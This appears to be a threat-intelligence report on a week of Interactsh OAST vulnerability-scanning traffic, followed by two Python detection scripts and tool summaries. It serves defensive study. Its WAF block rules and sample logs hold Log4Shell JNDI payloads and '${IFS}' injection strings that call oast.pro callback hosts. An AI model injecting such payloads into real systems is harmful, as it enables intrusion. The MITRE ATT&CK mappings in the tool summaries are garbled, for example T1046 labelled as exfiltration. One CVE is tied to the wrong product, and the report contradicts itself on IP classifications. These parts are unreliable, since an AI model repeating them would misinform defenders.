# Full Report
## Overview

During the week of January 31 - February 7, 2026, GreyNoise sensors observed 3,979 HTTP sessions from 245 unique IP addresses containing callbacks to Interactsh OAST (Out-of-band Application Security Testing) domains. The activity generated 3,707 unique OAST domains spanning 82 distinct campaign identifiers, indicating numerous independent scanning operations rather than coordinated infrastructure.

Analysis employed JA4T+JA4H fingerprint clustering, OAST domain decoding, and GreyNoise IP enrichment to characterize the scanning landscape. Key findings include:

- Hosting Infrastructure Dominance: Top ASNs include RouterHosting LLC (AS14956, 1,084 sessions), Cloudflare (AS13335, 651 sessions), and netcup GmbH (AS214996, 545 sessions)
- Scanner Identification: MSS value analysis reveals 1,341 sessions (33.7%) exhibit the anomalous MSS 65495 fingerprint characteristic of Nuclei scanner deployment
- CVE Targeting: 196 distinct vulnerability tags observed, with Apache Log4j RCE (CVE-2021-44228) accounting for 1,090 attempts (27.4% of total activity)
- Malicious Classification: GreyNoise classifies 19 of 20 top source IPs as "noise," with established reconnaissance infrastructure dating back to November 2025

The distributed nature of campaigns, absence of IP overlap between major campaigns, and heterogeneous fingerprint patterns indicate independent security testing operations rather than coordinated threat actor infrastructure.

## Temporal Analysis

Activity exhibited consistent volume across the analysis period with notable variations:

| Date | Sessions | Unique IPs | Unique Campaigns | Pattern |
|---|---|---|---|---|
| Jan 31 | 699 | 6 | 11 | Initial baseline |
| Feb 1 | 642 | 10 | 18 | Sustained activity |
| Feb 2 | 236 | 7 | 13 | Weekend reduction |
| Feb 3 | 149 | 11 | 15 | Low point |
| Feb 4 | 631 | 12 | 20 | Mid-week surge |
| Feb 5 | 386 | 12 | 17 | Sustained |
| Feb 6 | 573 | 214 | 20 | Anomalous multi-IP event |
| Feb 7 | 663 | 12 | 6 | Return to baseline |

Temporal Anomaly - February 6: A single-day spike to 214 unique IPs (vs. baseline 6-12) occurred on February 6, driven by campaign 01p6c, which recorded 204 unique IPs targeting a single OAST domain. This pattern suggests either:

1. A shared/reused OAST domain from prior scanning that triggered callbacks from cached payloads
2. A mass exploitation attempt using a common callback infrastructure

Hourly analysis reveals burst patterns concentrated in specific time windows:

- Jan 31, 15:00 UTC: 273 sessions (single campaign burst)
- Jan 31, 22:00 UTC: 135 sessions (campaign concentration)
- Feb 1, 15:00 UTC: 112 sessions (sustained scanning window)

No consistent diurnal pattern emerged, suggesting globally distributed scanning infrastructure operating across multiple timezones.

## Campaign Analysis

The 82 identified campaigns exhibit high heterogeneity, with most representing single-IP operations. Top campaigns by volume:

### Campaign: lftn9 (ksort: d5v0a0)

- Sessions: 652
- Source IPs: 1 (172.86.66.237)
- ASN: AS14956 (RouterHosting LLC)
- Active Period: Jan 31 - Feb 1
- Machine ID: af:ed:d2
- PID: 43608
- Fingerprint: JA4T `64240_2-4-8-1-3_1460_7` (standard MSS)
- GreyNoise Profile: Malicious classification, 7.4M sensor hits across 4 sensors, first seen Jan 19, 2026. Full-spectrum scanner with 300+ tags including Log4j, Confluence, pfSense, and numerous CVE-specific tags. Targets 169 ports.

### Campaign: ibe4q (ksort: d638bj)

- Sessions: 603
- Source IPs: 9 (Cloudflare-hosted)
- ASN: AS13335 (Cloudflare, Inc.)
- Active Period: Feb 7 (single-day burst)
- Machine ID: 4b:71:35
- PID: 50516
- Fingerprint: JA4T `65535_2-4-8-1-3_1380_13` (MSS 1380 - Cloudflare characteristic)
- Pattern: Multiple IPs from the same ASN suggest Cloudflare-hosted scanning infrastructure

### Campaign: 7bm4o (ksort: d627ng, d61gfu, d62tr4)

- Sessions: 545 total (245 + 210 + 90 across three runs)
- Source IPs: 1 (152.53.55.52)
- ASN: AS214996 (netcup GmbH)
- Active Period: Feb 4-6 (repeated execution)
- Machine ID: eb:b1:31
- PIDs: 13592, 19613, 56288 (different process per run)
- Fingerprint: JA4T `65495_2-4-8-1-3_65495_7` (Nuclei scanner MSS signature)
- GreyNoise Profile: Malicious classification, 16.8K sensor hits across 194 sensors, first seen Feb 3, 2026. Focused targeting: Log4j, React Server Components deserialization (CVE-2025-55182).

### Campaign: j6o66 (ksort: d61fft)

- Sessions: 231
- Source IPs: 1 (38.55.192.204)
- ASN: AS139659 (LUCIDACLOUD LIMITED)
- Active Period: Feb 4-5
- Fingerprint: JA4T `64240_2-4-8-1-3_1460_7` (standard MSS)
- GreyNoise Profile: NOT classified (no GreyNoise intelligence available)

### Campaign: 01p6c (ksort: cspn4b) - Anomaly

- Sessions: 204
- Source IPs: 204 (one-to-one mapping)
- ASNs: 5 distinct (AS20473, AS207990, AS202412, AS215439, AS8075)
- Active Period: Feb 6 (single day)
- Machine ID: 01:c9:98
- PID: 50061
- Pattern: A single OAST domain triggered callbacks from 204 distinct IPs. Likely represents cached payloads from earlier scanning activity or mass exploitation with shared callback infrastructure.

## Infrastructure Fingerprinting

### JA4 Fingerprint Analysis

Three dominant MSS patterns emerged, revealing scanner tooling:

| MSS Category | Sessions | IPs | Interpretation |
|---|---|---|---|
| MSS 1460 | 1,527 (38.4%) | 18 | Standard TCP MSS (Linux default) |
| MSS 65495 | 1,341 (33.7%) | 20 | Nuclei scanner signature |
| MSS 1380 | 651 (16.4%) | 9 | Cloudflare WARP VPN characteristic |
| Other | 460 (11.6%) | 209 | Heterogeneous/unclassified |

MSS 65495 Anomaly: The use of MSS 65495 is a well-documented fingerprint of the Nuclei vulnerability scanner. This non-standard value appears in JA4T fingerprints as `65495_2-4-8-1-3_65495_7`, indicating explicit configuration of the TCP Maximum Segment Size to this unusual value. 20 distinct IPs exhibited this fingerprint, spanning ASNs including AS214996 (netcup), AS14956 (RouterHosting), AS210083 (Privex), and AS14061 (DigitalOcean).

Cloudflare MSS 1380: All 651 sessions with MSS 1380 originated from AS13335 (Cloudflare), consistent with the TCP characteristics of Cloudflare's WARP VPN service. GreyNoise confirms VPN classification for 104.28.193.87 (WARP_VPN service).

### ASN Distribution

Top autonomous systems by session volume:

| ASN | Organization | Sessions | IPs | Campaigns | Category |
|---|---|---|---|---|---|
| AS14956 | RouterHosting LLC | 1,084 | 2 | 6 | Hosting |
| AS13335 | Cloudflare, Inc. | 651 | 9 | 2 | CDN/Hosting |
| AS214996 | netcup GmbH | 545 | 1 | 2 | Hosting |
| AS14061 | DigitalOcean, LLC | 269 | 4 | 7 | Cloud hosting |
| AS139659 | LUCIDACLOUD LIMITED | 256 | 1 | 2 | Hosting |
| AS51852 | Private Layer INC | 210 | 1 | 3 | Privacy hosting |
| AS20473 | The Constant Company | 185 | 178 | 3 | Hosting (Vultr) |
| AS210083 | Privex Inc. | 158 | 1 | 9 | Privacy hosting |

The dominance of hosting providers and cloud infrastructure reflects the typical scanning landscape, with actors operating from rented VPS infrastructure.

## Payload Analysis

GreyNoise tag analysis reveals broad-spectrum vulnerability reconnaissance targeting 196 distinct vulnerability classes:

### Top CVE Targets

| CVE / Payload Type | Sessions | Unique IPs | Description |
|---|---|---|---|
| Apache Log4j RCE (CVE-2021-44228) | 1,090 | 94 | Log4Shell JNDI injection |
| Fastjson RCE | 319 | 12 | Java deserialization |
| Generic XSS | 186 | 19 | Cross-site scripting probes |
| CGI Script Scanner | 184 | 16 | Legacy CGI vulnerabilities |
| Generic `${IFS}` RCE | 142 | 9 | Bash command injection |
| pfSense pfBlockerNG (CVE-2023-47246) | 136 | 7 | Command injection |
| Draytek Vigor (CVE-2024-12987) | 126 | 4 | Router command injection |
| GPON Router (CVE-2018-10561) | 112 | 15 | Router worm attempts |
| Path Traversal | 92 | 15 | Directory traversal |
| Seagate BlackArmor | 62 | 14 | NAS RCE attempts |

### Payload Characteristics

- Deserialization Targets: Fastjson, XStream, Apache OFBiz, Oracle WebLogic - focus on Java deserialization chains
- IoT/Edge Devices: GPON routers, Draytek, pfSense, Zyxel, Totolink - embedded device targeting
- Enterprise Software: Atlassian Confluence (CVE-2022-26134), VMware vCenter, FortiOS, Citrix
- CMS/Web Apps: WordPress plugins (multiple SQLi/RCE vulnerabilities), Joomla, Drupal

No evidence of active exploitation or malware delivery infrastructure. Activity patterns are consistent with vulnerability research, CVE validation, and attack surface mapping.

## GreyNoise Enrichment Analysis

A GreyNoise multi-IP check on the top 20 source IPs revealed:

- 19/20 classified as "noise" (active Internet scanners)
- 0/20 identified as common business services (not CDN/legitimate traffic)
- 1/20 no classification (38.55.192.204 - potentially new infrastructure)

### Notable GreyNoise Profiles

**172.86.66.237 (RouterHosting LLC)**

- Classification: MALICIOUS
- First Seen: Jan 19, 2026 (pre-dates analysis window)
- Sensor Hits: 7,418,938 across 4 sensors
- Tags: 300+ vulnerability-specific tags (full-spectrum scanner)
- Scanned Ports: 169 ports (comprehensive port scanning)
- Bot: No | Tor: No | VPN: No
- Assessment: Established reconnaissance infrastructure, long-term persistent scanning

**152.53.55.52 (netcup GmbH)**

- Classification: MALICIOUS
- First Seen: Feb 3, 2026 (recent activation)
- Sensor Hits: 16,848 across 194 sensors (broad targeting)
- Tags: Log4j, React Server Components CVE-2025-55182, OAST domains
- Scanned Ports: 10 (web-focused: 80, 443, 3000, 8080, 9000, etc.)
- Bot: No | Tor: No | VPN: No
- Assessment: Focused web vulnerability scanner, recent deployment

**104.28.193.87 (Cloudflare)**

- Classification: MALICIOUS
- First Seen: Nov 9, 2025 (long-term infrastructure)
- Sensor Hits: 81,099 across 17 sensors
- Tags: 400+ tags (full-spectrum scanner)
- Scanned Ports: 5 (web-only: 80, 443, 7001, 8080, 8443)
- Bot: No | Tor: No | VPN: Yes (WARP_VPN)
- Assessment: Cloudflare-hosted scanning via WARP VPN, established infrastructure

## Attribution Assessment

Confidence: Low

The distributed, heterogeneous nature of the observed activity precludes meaningful threat actor attribution.

Evidence supporting independent operations:

- Campaign Isolation: 82 distinct campaigns with minimal IP overlap (exception: Feb 6 anomaly)
- Diverse Infrastructure: 245 IPs across 45+ ASNs spanning 30+ countries
- Heterogeneous Tooling: Mix of Nuclei (MSS 65495), custom tooling (standard MSS), Cloudflare-hosted infrastructure
- Varied Targeting: While Log4j dominates, 196 distinct vulnerability classes indicate non-coordinated reconnaissance priorities
- Temporal Distribution: No coordinated timing patterns; activity distributed across timezones

Infrastructure categories:

- Bug Bounty Hunters: Single-IP campaigns with focused targeting patterns
- Penetration Testing Tools: Nuclei scanner deployment (20 IPs)

No indicators of coordinated threat actor activity, nation-state operations, or organized criminal infrastructure.

## Network IOCs

### Primary Source IPs

| IP Address | ASN | Organization | Sessions | Campaigns | GreyNoise |
|---|---|---|---|---|---|
| 172.86.66.237 | AS14956 | RouterHosting LLC | 867 | 4 | MALICIOUS |
| 152.53.55.52 | AS214996 | netcup GmbH | 545 | 2 | MALICIOUS |
| 104.28.193.87 | AS13335 | Cloudflare | 389 | 2 | MALICIOUS (VPN) |
| 38.55.192.204 | AS139659 | LUCIDACLOUD | 256 | 2 | None |
| 107.189.16.186 | AS14956 | RouterHosting LLC | 217 | 2 | MALICIOUS |
| 179.43.146.42 | AS51852 | Private Layer INC | 210 | 3 | MALICIOUS |
| 185.130.47.197 | AS210083 | Privex Inc. | 158 | 9 | MALICIOUS |
| 209.38.59.247 | AS14061 | DigitalOcean | 126 | 2 | MALICIOUS |
| 94.156.102.143 | AS215439 | PLAY2GO INTL | 104 | 2 | MALICIOUS |
| 20.64.169.232 | AS8075 | Microsoft Corp | 94 | 5 | MALICIOUS |

### OAST Domain Pattern

All observed domains follow the Interactsh format: `[subdomain].oast.pro`

Example campaign domains:

- Campaign lftn9: `d5v0a0lftn9*.oast.pro` (652 unique domains)
- Campaign ibe4q: `d638bjibe4q*.oast.pro` (603 unique domains)
- Campaign 7bm4o: `d627ng7bm4o*.oast.pro`, `d61gfu7bm4o*.oast.pro`, `d62tr47bm4o*.oast.pro` (545 total)

Decoding Pattern:

- The ksort value (e.g., `d5v0a0`) represents a timestamp + sequential identifier
- The campaign value (e.g., `lftn9`) is derived from machine ID, PID, and counter
- Each session generates a unique subdomain for callback correlation

### JA4 Fingerprints for Detection

**Nuclei Scanner (MSS 65495):**

- JA4T: `65495_2-4-8-1-3_65495_7`
- JA4H: `ge11nr17${jn_8062e975b6e7_*`

**Standard MSS (RouterHosting infrastructure):**

- JA4T: `64240_2-4-8-1-3_1460_7`
- JA4H: `ge11nn020000_1af9d02f0bf7_*`
- JA4H: `po11nn060000_4ea4093e6290_*`
- JA4H: `ge10nn010000_4a823118b9ba_*`

**Cloudflare WARP VPN:**

- JA4T: `65535_2-4-8-1-3_1380_13`
- JA4H: `po11nn08en00_9cf61e78b7a7_*`

## Detection Recommendations

- Monitor for Interactsh OAST callbacks in outbound DNS and HTTP traffic. Alert on requests to `*.oast.pro`, `*.interact.sh`, and `*.burpcollaborator.net` domains originating from internal production systems (exception: authorized security testing).
- JA4 fingerprint detection for Nuclei scanner identification:
  - Alert on JA4T fingerprint `65495_2-4-8-1-3_65495_7`
  - Correlate with OAST callbacks for high-confidence reconnaissance detection
- Prioritize patching for the top targeted CVEs:
  - CVE-2021-44228 (Log4Shell) - 1,090 attempts observed
  - CVE-2023-47246 (pfSense pfBlockerNG) - 136 attempts
  - CVE-2024-12987 (Draytek Vigor) - 126 attempts
  - CVE-2022-26134 (Atlassian Confluence) - 57 attempts
- ASN-based rate limiting for hosting providers exhibiting malicious classification:
  - AS14956 (RouterHosting LLC)
  - AS214996 (netcup GmbH)
  - AS210083 (Privex Inc.)
  - Consider geo-blocking or aggressive rate limiting for non-business-critical origins
- WAF rules for OAST injection patterns:
  - Block requests containing `${jndi:ldap://` (Log4j)
  - Block requests with `.oast.pro` or `.interact.sh` in headers, body, or query parameters
  - Alert on `${IFS}` command injection attempts
- February 6 anomaly investigation: Organizations with traffic to/from the 204 IPs in campaign 01p6c should investigate for cached exploitation attempts. The spike suggests a prior vulnerability with delayed OAST callbacks.

## GNQL Queries

- Monitor recent OAST callback activity: `tags:"Generic Contains Well-known Out-of-band Interaction Domain" last_seen:7d`
- Track Nuclei scanner deployment (MSS 65495): `metadata.ja4.tcp:"65495_2-4-8-1-3_65495_7" last_seen:7d`
- Investigate top malicious ASNs: `metadata.asn:AS14956 last_seen:7d`, `metadata.asn:AS214996 last_seen:7d`, `metadata.asn:AS13335 tags:"Generic Contains Well-known Out-of-band Interaction Domain" last_seen:7d`
- Log4j targeting IPs: `tags:"Apache Log4j RCE Attempt" tags:"Generic Contains Well-known Out-of-band Interaction Domain" last_seen:7d`
- Cloudflare-hosted scanners: `metadata.asn:AS13335 classification:malicious last_seen:7d`
- New/emerging scanning infrastructure (Feb 3+ first seen): `tags:"Generic Contains Well-known Out-of-band Interaction Domain" first_seen:>2026-02-03`
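As an added example (not GreyNoise's code or the tooling behind this report), the script below applies the JA4T MSS classification and the Interactsh subdomain decoding described above to a few constructed inbound HTTP session records and scores them the way the detection recommendations suggest: MSS 65495 together with an OAST callback is high confidence, an OAST callback alone is medium, MSS 65495 alone is low. The log schema (`src_ip`, `ja4t`, `request`) and the sample records are assumptions; the fingerprints and the two scanner IPs in the samples are taken from the report.

```python
"""Score inbound HTTP sessions by JA4T MSS class and Interactsh OAST callbacks.
Added example, not GreyNoise's code; the log schema (src_ip, ja4t, request)
and the sample records below are constructed assumptions."""
import re
from collections import defaultdict

MSS_CLASSES = {1460: "standard", 65495: "nuclei", 1380: "cloudflare-warp"}  # report buckets
# Interactsh subdomain layout per the report: 6-char ksort, 5-char campaign id,
# then a per-session suffix. Decoding is only attempted for *.oast.pro names.
OAST_RE = re.compile(r"(?<![a-z0-9.-])(?P<ksort>[a-z0-9]{6})(?P<campaign>[a-z0-9]{5})"
                     r"(?P<session>[a-z0-9]*)\.oast\.pro\b", re.I)
OTHER_OAST_RE = re.compile(r"[a-z0-9.-]+\.(?:interact\.sh|burpcollaborator\.net)\b", re.I)

def parse_ja4t(ja4t):
    """Split a JA4T string (window_options_mss_scale) into fields; None if malformed."""
    parts = ja4t.split("_")
    if len(parts) != 4:
        return None
    try:
        return {"window": int(parts[0]), "options": parts[1],
                "mss": int(parts[2]), "scale": int(parts[3])}
    except ValueError:
        return None

def classify_mss(mss):
    return MSS_CLASSES.get(mss, "other")

def decode_oast(text):
    """Decoded oast.pro callbacks found anywhere in a request (URI, headers, body)."""
    return [m.groupdict() for m in OAST_RE.finditer(text)]

def triage(records):
    """Nuclei MSS + OAST callback = high; OAST only = medium; Nuclei MSS only = low."""
    findings = []
    for rec in records:
        fp = parse_ja4t(rec["ja4t"])
        mss_class = classify_mss(fp["mss"]) if fp else "unparsed"
        callbacks = decode_oast(rec["request"])
        has_oast = bool(callbacks) or OTHER_OAST_RE.search(rec["request"]) is not None
        if mss_class == "nuclei" and has_oast:
            severity = "high"
        elif has_oast:
            severity = "medium"
        else:
            severity = "low" if mss_class == "nuclei" else "none"
        findings.append({"src_ip": rec["src_ip"], "mss_class": mss_class, "severity": severity,
                         "campaign": callbacks[0]["campaign"] if callbacks else None})
    return findings

def campaign_summary(findings):
    """(sessions, unique source IPs) per campaign id, as in the report's campaign table."""
    sessions, ips = defaultdict(int), defaultdict(set)
    for f in findings:
        if f["campaign"]:
            sessions[f["campaign"]] += 1
            ips[f["campaign"]].add(f["src_ip"])
    return {c: (sessions[c], len(ips[c])) for c in sessions}

# Constructed sample sessions; fingerprints and the two scanner IPs come from the report.
SAMPLE_LOG = [
    {"src_ip": "152.53.55.52", "ja4t": "65495_2-4-8-1-3_65495_7",
     "request": "GET /?x=${jndi:ldap://d627ng7bm4oabcdef.oast.pro/a} HTTP/1.1"},
    {"src_ip": "172.86.66.237", "ja4t": "64240_2-4-8-1-3_1460_7",
     "request": "GET / HTTP/1.1\r\nUser-Agent: ${jndi:ldap://d5v0a0lftn9ghijk.oast.pro/a}"},
    {"src_ip": "203.0.113.7", "ja4t": "65495_2-4-8-1-3_65495_7",
     "request": "GET /robots.txt HTTP/1.1"},
    {"src_ip": "198.51.100.9", "ja4t": "64240_2-4-8-1-3_1460_7",
     "request": "GET /index.html HTTP/1.1"},
]
```

Running `triage(SAMPLE_LOG)` scores the four samples high, medium, low and none in that order, and `campaign_summary` groups the two callbacks under campaigns `7bm4o` and `lftn9`.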
# Analysis Summary
# Tool/Technique: Nuclei Scanner
## Overview
Nuclei is an open-source, high-performance scanner built to enumerate assets and detect vulnerabilities based on community-contributed templates. It is identified in this context by its anomalous TCP Maximum Segment Size (MSS) value used during scanning, which leaves a distinct network fingerprint.
## Technical Details
- Type: Attack Tool (Vulnerability Scanner)
- Platform: General (Network/Web Scanners)
- Capabilities: Vulnerability scanning, exploitability verification, reconnaissance, OAST integration.
- First Seen: Referenced infrastructure observed as early as January 19, 2026 (GreyNoise profile for scanner 172.86.66.237). Specifically observed in Campaign 7bm4o starting February 3, 2026.
## MITRE ATT&CK Mapping
- TA0043 - Impact (N/A - Reconnaissance Phase)
- T1595 - Active Scanning
- T1595.002 - Internet Service Scanning
## Functionality
### Core Capabilities
* Leverages a large set of declarative YAML templates to identify vulnerabilities rapidly.
* Integral to the observed activity through the use of Out-of-Band Application Security Testing (OAST) domains (Interactsh) to confirm command or code execution vulnerabilities.
### Advanced Features
* Distinct network fingerprint characterized by MSS value 65495 in the TCP handshake, enabling specific network-level identification.
* Targets a wide array of vulnerabilities, including high-profile CVEs like Log4j (CVE-2021-44228) and newer deserialization flaws (CVE-2025-55182).
## Indicators of Compromise
- File Hashes: N/A (Relates to network traffic/fingerprinting, not a dropped payload)
- File Names: N/A
- Registry Keys: N/A
- Network Indicators:
  - **JA4T Fingerprint:** `65495_2-4-8-1-3_65495_7` (Indicator of customized MSS)
  - Associated IPs leveraging this fingerprint include: 152.53.55.52 (AS214996/netcup GmbH).
- Behavioral Indicators: OAST callbacks to Interactsh domains during probing attempts.
## Associated Threat Actors
The scanner itself is a common tool used by security researchers, bug bounty hunters, and penetration testers. The analysis suggests these activities are characteristic of independent security testing rather than a specific coordinated threat actor group.
## Detection Methods
- **Signature-based detection:** Alert on the specific JA4T fingerprint `65495_2-4-8-1-3_65495_7`.
- **Behavioral detection:** Alert on outbound DNS or HTTP requests to OAST domains (`*.oast.pro`, `*.interact.sh`) originating from internal assets being probed.
- **Pattern Matching:** Alert on WAF/Proxy indicators containing `${IFS}` command injection strings.
## Mitigation Strategies
- **Patching:** Prioritize remediation for highly targeted vulnerabilities such as CVE-2021-44228 (Log4j).
- **Network Monitoring:** Implement network egress filtering or deep packet inspection to rapidly identify and block OAST callback attempts.
- **WAF Hardening:** Deploy rules to block common OAST injection payloads (e.g., `${jndi:ldap://`).
## Related Tools/Techniques
- ProjectDiscovery Interactsh (The OAST service used for callback verification).
- Other general scanners identified via standard MSS (1460) or Cloudflare WARP (MSS 1380) fingerprints.
---
# Tool/Technique: Interactsh OAST Callback Mechanism
## Overview
Interactsh is an Open-Source Out-of-Band Application Security Testing (OAST) platform utilized by scanners to confirm vulnerabilities that rely on external interaction (e.g., blind SSRF, RCE via JNDI lookup). Interaction with observer domains signals successful payload delivery.
## Technical Details
- Type: Technique (Reconnaissance/Verification Method)
- Platform: Network/Web Applications (Generates outbound DNS/HTTP requests)
- Capabilities: Verifies remote code execution, blind injection, or deserialization flaws by monitoring DNS lookups or HTTP requests destined for specific OAST domains.
- First Seen: Activity covered Jan 31 - Feb 7, 2026.
## MITRE ATT&CK Mapping
- TA0007 - Discovery
- T1598 - DNS of Target Systems
- T1598.003 - Domain Requests (Implicitly, when using OAST confirmation)
- TA0011 - Command and Control (Indirectly, as a communication channel during testing)
- T1032 - External Control Channel Techniques (Verification phase)
## Functionality
### Core Capabilities
* The technique relies on the scanner embedding a unique, single-use OAST domain (e.g., `[subdomain].oast.pro`) into a payload.
* Successful connection or successful resolution of this unique domain back to the Interactsh infrastructure confirms the vulnerability's existence.
### Advanced Features
* **Campaign Isolation:** Each session generates a unique domain, allowing threat actors/testers to map specific callbacks back to the originating scan attempt via machine ID/PID correlation in the domain structure.
* **Temporal Anomaly:** The campaign `01p6c` demonstrated an anomaly where 204 distinct IPs triggered callbacks to a single domain, potentially indicating cached responses or a mass exploitation event utilizing shared callback infrastructure.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators:
  - Target Domains: All domains ending in `*.oast.pro` (or similar, such as `*.interact.sh`, `*.burpcollaborator.net`).
  - Example correlated callback patterns: `d5v0a0lftn9*.oast.pro`.
- Behavioral Indicators: Outbound traffic (HTTP GET/HEAD, DNS A/AAAA/PTR/NS queries) directed towards these unique domains from internal or perimeter assets.
## Associated Threat Actors
Vulnerability researchers, penetration testers, and potentially automated attack tools leveraging this verification methodology. No specific threat actor attributed.
## Detection Methods
- **Egress Monitoring:** Monitoring DNS and HTTP traffic for known OAST domain patterns is a hard requirement.
- **WAF/Proxy Rules:** Immediate blocking of requests containing known OAST domains in URL/headers/body.
- **Correlation:** Tying observed OAST callbacks to internal asset activity immediately before the callback confirms a reconnaissance attempt.
## Mitigation Strategies
- **Outbound Policy:** Implement stringent egress policy restricting connections to external, unapproved domains, especially those commonly associated with security tooling.
- **Payload Sanitization:** Ensure web application input fields are strictly sanitized to prevent injection of OAST syntax or domain names.
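As an added example (not the page's or ProjectDiscovery's code), the script below applies the egress-monitoring and outbound-policy guidance above to a constructed resolver log: every lookup of an OAST domain by an internal host is raised as an alert, and hosts that are not on an authorized-testing allowlist are listed for triage, since resolving such a name means an injected payload was evaluated. The log line format, the internal address ranges and the allowlist are assumptions.

```python
"""Flag egress DNS lookups of OAST domains from internal hosts.
Added example, not the page's or ProjectDiscovery's code; the resolver log format,
the internal ranges and the authorized-tester allowlist are constructed assumptions."""
import ipaddress
import re

OAST_SUFFIXES = (".oast.pro", ".interact.sh", ".burpcollaborator.net")
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "192.168.0.0/16")]
AUTHORIZED_TESTERS = {"10.0.9.9"}  # hosts expected to generate OAST callbacks (assumption)
# Assumed resolver log format: "<timestamp> <client-ip> <qtype> <qname>"
LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<qtype>[A-Z]+)\s+(?P<qname>\S+)$")

def is_oast(qname):
    """True for any name under the OAST zones named in the report."""
    return qname.rstrip(".").lower().endswith(OAST_SUFFIXES)

def is_internal(ip):
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in INTERNAL_NETS)

def scan_dns_log(lines):
    """One alert per OAST lookup from an internal client; malformed lines are skipped."""
    alerts = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or not is_internal(m["client"]) or not is_oast(m["qname"]):
            continue
        alerts.append({"ts": m["ts"], "host": m["client"], "qtype": m["qtype"],
                       "qname": m["qname"].rstrip(".").lower(),
                       "authorized": m["client"] in AUTHORIZED_TESTERS})
    return alerts

def hosts_needing_triage(alerts):
    """Internal hosts whose unauthorized OAST lookup shows an injected payload was evaluated."""
    return sorted({a["host"] for a in alerts if not a["authorized"]})

# Constructed log lines; the callback names reuse campaign prefixes from the report.
SAMPLE_DNS_LOG = [
    "2026-02-04T10:15:01Z 10.0.4.21 A d627ng7bm4oabcdef.oast.pro.",
    "2026-02-04T10:15:01Z 10.0.4.21 AAAA d627ng7bm4oabcdef.oast.pro.",
    "2026-02-04T10:16:00Z 10.0.9.9 A d5v0a0lftn9ghijk.oast.pro.",
    "2026-02-04T10:16:30Z 192.168.1.50 A www.example.com.",
    "2026-02-04T10:17:00Z 203.0.113.5 A abc123.interact.sh.",
    "not a log line",
]

if __name__ == "__main__":
    found = scan_dns_log(SAMPLE_DNS_LOG)
    print(found, hosts_needing_triage(found))
```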
## Related Tools/Techniques
- Blind SSRF/RCE Exploitation Frameworks.
- Burp Collaborator (a commercial alternative OAST tool).
---
# Technique: Anomalous TCP Maximum Segment Size (MSS 65495) Probing
## Overview
This refers to the technique of manipulating the TCP MSS option in the SYN packet to a non-standard value, specifically 65495, used predominantly by the Nuclei scanner to fingerprint its traffic. This is a configuration choice within the tool rather than an inherent vulnerability.
## Technical Details
- Type: Technique (Tool Configuration/Fingerprinting)
- Platform: TCP/IP Layer
- Capabilities: Used for host fingerprinting; signifies the use of the Nuclei scanner against network services.
- First Seen: 1,341 sessions exhibiting this fingerprint were observed, distributed across 20 unique IPs during the reporting period.
## MITRE ATT&CK Mapping
- TA0016 - Collection (Implicitly to gather data on what systems respond)
- T1046 - Exfiltration Over C2 Channel (The associated reconnaissance is the precursor to this)
## Functionality
### Core Capabilities
* The value 65495 is explicitly set in the TCP option field by the scanner, resulting in the JA4T fingerprint component `65495_2-4-8-1-3_65495_7`.
* This technique reveals the use of high-automation, template-driven scanning activity.
### Advanced Features
* High correlation with successful OAST callback verification, confirming that these probes are specifically aimed at confirming known vulnerabilities.
## Indicators of Compromise
- Network Indicators:
  - **JA4T Fingerprint:** `65495_2-4-8-1-3_65495_7`
## Associated Threat Actors
Users of the Nuclei scanner, identified contextually as independent security testers due to the diversified targeting and non-coordinated IP infrastructure.
## Detection Methods
- **JA4/JA4H Detection:** Primary detection relies on identifying the unique MSS configuration via JA4 analysis platforms.
- **Correlation:** Alert when the MSS 65495 fingerprint occurs in conjunction with an external connection attempt (e.g., OAST callback).
## Mitigation Strategies
- **Network Visibility:** Ensure full packet capture or deep flow analysis capable of inspecting Layer 4 TCP options (like MSS) is deployed.
## Related Tools/Techniques
- Nuclei Scanner (the tool utilizing this configuration).
- Other MSS manipulation techniques used by different scanning tools.